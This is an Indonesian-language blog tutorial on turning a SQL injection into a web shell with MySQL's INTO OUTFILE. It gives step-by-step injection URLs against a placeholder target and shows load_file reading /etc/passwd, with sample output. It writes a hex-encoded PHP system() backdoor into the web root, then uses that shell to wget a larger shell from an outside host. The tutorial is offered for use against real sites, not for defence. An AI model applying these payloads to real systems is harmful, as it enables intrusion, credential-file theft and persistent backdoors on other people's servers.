Sql Into Outfile sama dengan SQL Injection akan tetapi Sql Into Outfile ini tidak memerlukan form upload pada dashboard admin untuk mengupload shell backdoor, jadi kita mengupload shell pada saat melakukan injeksi sql. Penasaran kan?, Mari simak tutorial berikut ini.
1.) Carilah target yang vuln Sql-i terlebih dahulu
2.) Setelah mendapatkan target lakukan lah Sql Injection sampai mencari angka ajaib atau pada union+select+--+
3.) Setelah muncul angka ajaib dari website target, cobalah lihat etc/passwd dengan memasukan load_file('etc/passwd') / load_file(0x2f6574632f706173737764) pada angka ajaib. Contohnya :
Dan akan muncul .
target.com/.php?id=-1'+union+select+1,2(angka ajaibnya),3,4--+
target.com/.php?id=-1'+union+select+1,load_file(0x2f6574632f706173737764),3,4--+
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin4.) Setelah muncul tulisan seperti diatas dan menemukan path website target kalian tinggal mengupload shell CMD dengan memasukan ini pada angka ajaib 0x3c3f7068702073797374656d28245f4745545b636d645d293b3f3e dan menambahkan +into+outfile+'/path/s.php' pada belakang angak sebelum --+ contohnya.
target.com/.php?id=-1'+union+select+1,0x3c3f7068702073797374656d28245f4745545b636d645d293b3f3e,3,4+into+outfile+'/home/public_html/mastah/s.php'--+Setelah itu cobalah akses shell kalian sesuai tempat menyimpan / path shell CMD kalian contohnya mastahcyber.tech/s.php.
Kenapa cuman muncul angka?, karena itu shell sederhana, jika kalian ingin mengupload shell besar kalian tinggal menambahkan ?cmd=wget linkshell.com/shell.txt lalu ?cmd=mv shell.txt shell.php dan cobalah akses shell tersebut sesuai path dan nama shell tersebut.
Share This :
comment 0 comments
more_vert